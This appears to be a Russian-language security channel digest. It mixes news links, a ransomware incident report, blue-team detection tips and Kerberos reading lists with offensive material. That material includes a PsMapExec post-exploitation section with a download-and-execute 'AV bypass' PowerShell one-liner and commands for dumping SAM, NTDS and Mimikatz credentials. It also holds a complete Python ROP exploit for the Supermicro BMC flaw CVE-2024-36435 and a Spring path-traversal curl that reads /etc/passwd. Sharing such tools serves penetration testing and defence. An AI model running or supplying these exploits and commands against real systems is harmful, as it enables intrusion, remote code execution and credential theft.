Fsecurity | HH

🔗Ссылка: https://www.securitylab.ru/news/552645.php

🔄 💻 PsMapExec v0.7.0 Отличный инструмент для пост эксплуатации 💻 Active Directory, написанный на PowerShell. UPD. Начиная с версии 0.6.0, PsMapExec больше не имеет каких-либо внешних зависимостей, кроме модуля Amnesiac. PsMapExec теперь можно запускать в ограниченных средах, таких как экзаменационные лаборатории или машины CTF Изменения в v0.7.0:

- Updated IP and CIDR handling logic - Updated LDAP query logic - Added additional groups and logic for when parsing for interesting users from module dumps - Fixed SessionHunter output to not return the created Class - Added layered encryption to the new module additions - Tidied up some others bits around the command and module logic section - Added Toast notification for password spraying - Added ticket expiry time to module tgtdeleg - Added -Module VMCheck. Simple Module that checks if the remote system is a VM or physical system - Fixed an issue where inaccurate data for machine accounts may be parsed with -Module eKeys

Текущая поддержка методов (протоколов): 🔵RDP 🔵SessionHunter 🔵SMB 🔵SMB Signing 🔵Spraying 🔵VNC 🔵WinRM 🔵WMI 🔵MSSQL 🔵Kerberoast Реализованные модули: 🔵 Amnesiac - выполнение Amnesiac C2 пейлоадов 🔵 ConsoleHistory - история в PowerShell 🔵 Files - файлы в типичных директориях 🔵 KerbDump - дамп Kerberos билетов 🔵 eKeys - дамп ключей (Mimikatz) 🔵 LogonPasswords - дамп logon passwords (Mimikatz) 🔵 LSA - дамп LSA (Mimikatz) 🔵 NTDS - реализация DCsync 🔵 SAM - дамп SAM Загрузка скрипта в память (AV bypass):

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")

Примеры:

# Текущий пользователь
PsMapExec -Targets All -Method [Method]

# С паролем
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]

# С хешем
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]

# С билетом
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]

# Дамп SAM файла
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM

# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput

# Использование модулей
PsMapExec -Targets All -Method [Method] -Module [Module]

💻 Github ▪️ Documentation #soft #pentest #powershell #psmapexec #activedirectory #windows ✈️ // Pentest HaT 🎩

🔗Ссылка: https://www.securitylab.ru/news/552628.php

Наш Discord сервер 👆🏻Тут можно пообщаться 🦈

И снова ловим вымогателей, использующих связку Lockbit и Babuk. В новом инциденте атакующие получили доступ во внутреннюю сеть жертвы (организация А) через атаку Trusted Relationship (T1199) и закрепили в сети уже известный нам инструмент для туннелирования трафика – localtonet. В процессе разведки инфраструктуры атакующие обнаружили в том же сетевом сегменте домены ещё двух организаций B и С, где домены оказались с доверительными отношениями. Так злоумышленники получили учётки из доменов организаций B и С. Но атакующие не успели пошифровать организацию А: её защитники вовремя заметили подозрительную активность и экстренно отреагировали (погасили сетку). Заподозрив неладное, атакующие попытались развить атаку в другом направлении. В этом им помогли собранные учётки из домена организации B, а также VPN без второго фактора. Атакующие незаметно закрепили на одной системе организации B новые инструменты для туннелирования: cloudflared и gost. Однако быстрые коммуникации между организациями A, B и С, а также знания об атаке на A и новые подробности из B и С позволили остановить атаку до импакта – то есть оперативно повыключать всё, что могло зашифроваться, и в рабочем режиме исправлять-защищать инфру. План шифровальщиков на этот раз не сработал. А вы готовы к таким выкрутасам? Проверьте эти индикаторы:

argotunnel[.]com
*.argotunnel[.]com

🔗Ссылка: https://xakep.ru/2024/10/02/insider-trading-hack/

DOCKER# Privilege Escalation * From normal to R00T user using this simple technique ! #dicker

🔗Ссылка: https://www.anti-malware.ru/news/2024-10-02-114534/44299

🔗Ссылка: https://habr.com/ru/companies/bastion/articles/847330/

🔗Ссылка: https://www.securitylab.ru/news/552592.php

💊 Небезопасная совместимость 🖋 Пост преимущественно рассчитан на соковцев, но и остальным полезно знать. Только не красным, им эти знания ни к чему, разве что мне работы добавят 🍞 Есть у микромягких такое качество как "Забота о пользователях". Верите? Вот и я нет. Тем не менее существует такой механизм как WOW64 (Windows-on-Windows 64-bit). Он даёт возможность 32-битным приложениям запускаться на 64-битной системе, перенаправляя их запросы, если таковые имеются, от файлов в папке System32, к соответствующему файлу в SysWOW64. 👍 Соответственно при написании правил корреляции с привязкой к директориям, вроде C:\Windows\System32\, надо не забывать про артефакты, которые нам подкидывает такая обратная совместимость, а именно:

1. C:\Windows\SysWOW64\certutil.exe
2. C:\Windows\SysWOW64\schtasks.exe
3. C:\Windows\SysWOW64\cmd.exe

☹️ И так далее. Даже если мы отслеживаем запуск утилит по их путям по умолчанию, то в легкую можем проморгать запуск их из подобных мест. 📕 Раз уж заговорили про "подобные места" - то же самое необходимо помнить и про механизм WinSxS (Windows Side by Side). Данный раздел предназначен не для совместимости 32 и 64 битных приложений, а уже скорее для хранения различных версий системных файлов и библиотек и обеспечения стабильность системы при одновременной работе множества приложений, требующих разные версии одних и тех же библиотек. Но мы здесь за другим - принцип тот же, но вот пути уже могут быть уникальными, но необязательно. Если кратко, то на двух устройствах с идентичными версией Windows, обновлениями и компонентами пути будут совпадать. Пример:

1. C:\Windows\WinSxS\wow64_microsoft-windows-commandprompt_31bf3856ad364e35_10.0.19041.4355_none_0a1b90d903f78201\cmd.exe
2. C:\Windows\WinSxS\wow64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.3996_none_e7e7d1c1ebfac592\powershell.exe

⬇️ И таких примеров сильно больше, чем я указал. Более подробно об этом можно посмотреть здесь - Доклад с PHD2 #blueteam

В своем докладе на прошедшем этой весной киберфестивале Positive Hack Days Fest 2 я рассказывал о том, почему важно обеспечивать комплексный подход к безопасности атакующей инфраструктуры. В том числе упоминал о серьезных узявимостях в различных С2 фреймворках с открытым исходным кодом. В продолжении этой темы, мне на глаза попалась статья - Vulnerabilities in Open Source C2 Frameworks, в которой автор рассмотрел найденные баги для популярных и не очень С2 фреймворков: 🔴 Sliver Когда-то давно был моим фаворитом, а теперь там нашли довольно прикольную багу CVE-2024-41111 - RCE on the teamserver by a low-privileged operator, по сути command injection в аргумент для msfvenom, который Sliver использует для генерации msf stagers. 🔴 Havoc Набирающий популярность фреймворк на Go c 3 багами: CVE-2024-41570 - Unauthenticated SSRF, Authenticated Command Injection, Service API Authentication Bypass (детали в статье). 🔴 Ninja С2, фреймворк на основе ликнутых исходников иранской APT Muddywater, отметился RCE через Unauthenticated Arbitrary File Download via path traversal веб сервера инструмента. 🔴 SHAD0W Unauthenticated RCE - еще одна интересная бага, эксплуатация которой заключается в том, что Situational awareness данные об архитектуре, домене, версии ОС передаваемые при отстуке beacon'a на сервер, используются в качестве параметра для компиляции модулей пост-эксплуатации. 🔴 Covenant, когда-то тоже был одним из моих фаворитов, подвержен Authenticated Command Injection и повышению привилегий до администратора через UI (детали в статье). Таким образом, все рассмотренные С2 фреймворки, за исключением Mythic (о котором уже неоднократно писал ранее) подвержены серьезным узявимостям, которые ставят под угрозу безопасность атакующей инфраструктуры и как следствие обеспечивают потенциальным злоумышленникам доступ к данным и инфре тестируемой организации.

Мы знаем как админы не любят менять заводские пароли к админкам сереров типа iDrac, iLO и др. И вот вишинка #CVE-2024-36435 с CVSS 9.8 в прошивке BMC компании Supermicro в некоторых материнских платах X11, X12, H12, B12, X13, H13 и B13 (и модулях CMM6). Неавторизованный пользователь может отправить в интерфейс поддельные данные, которые вызывают переполнение буфера стека и могут привести к произвольному RCE а на BMC. https://www.binarly.io/blog/cve-2024-36435-deep-dive-the-years-most-critical-bmc-security-flaw PoC:

# CVE-2024-36435 – Buffer overflow vulnerability in Supermicro BMC IPMI firmware due to unchecked length of user-supplied value

import base64
import requests

from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# set target and command values
target = "https://192.168.10.53:443/cgi/login.cgi"
command = "touch /tmp/BRLY"

libc_base = 0x76283000  # we try to guess
gadget_1_offset = 0x000D8874  # pop {r0, r1, r2, r3, fp, pc};
gadget_2_offset = 0x001026D4  # mov r0, sp; blx r3;
system_offset = 0x0003C4D4

print(f"Target: {target}")
print(f"Command: {command}")
print()
print(f"libc_base: {libc_base:#x}")
print(f"gadget_1_offset: {gadget_1_offset:#x}")
print(f"gadget_2_offset: {gadget_2_offset:#x}")
print(f"system_offset: {system_offset:#x}")
print()


payload = base64.b64encode(
    b"\x00" * 456
    + int.to_bytes(libc_base + gadget_1_offset, 4, "little")  # gadget_1
    + b"\x00" * 12
    + int.to_bytes(libc_base + system_offset, 4, "little")  # system
    + b"\x00" * 4
    + int.to_bytes(libc_base + gadget_2_offset, 4, "little")  # gadget_2
    + command.encode()
).decode()

data = f"name={payload}&pwd=&check=1"

print("Sending requests...")
i = 0
while True:
    print(f"Request: '{i}'")
    r = requests.post(target, data=data, verify=False)
    i += 1

Spring CVE-2024-38816 Path traversal Proof of Concept (PoC):

curl http://<HOST>/static/link/%2e%2e/etc/passwd

Affected Spring Products and Versions Spring Framework: * 5.3.0 - 5.3.39 * 6.0.0 - 6.0.23 * 6.1.0 - 6.1.12 Older, unsupported versions are also affected

CVE-2024-36435 * RCE Flaw in Supermicro BMC IPMI Firmware * WriteUp * POC exploit #servers #ipmi #rce

🔗Ссылка: https://xakep.ru/2024/10/01/meganews-306/

🔗Ссылка: https://www.anti-malware.ru/news/2024-10-01-121598/44285

🔗Ссылка: https://spy-soft.net/manspider-search-files-smb/

✔️ Kerberos, again Заключительная, 4 часть из серии публикаций о протоколе Kerberos, начиная с основ и до различных методов эксплуатации. Весь материал представлен на английском языке. 🔗 Kerberos IV - Delegations 🔗 1 часть 🔗 2 часть Software: 😹 Kerbrute 😹 hashcat 😹 impacket 😹 Rubeus 😹 mimikatz 😹 keytab.py 😹 gettgtpkinit.py 🦈 Wireshark #kerberos ✈️ // Pentest HaT 🎩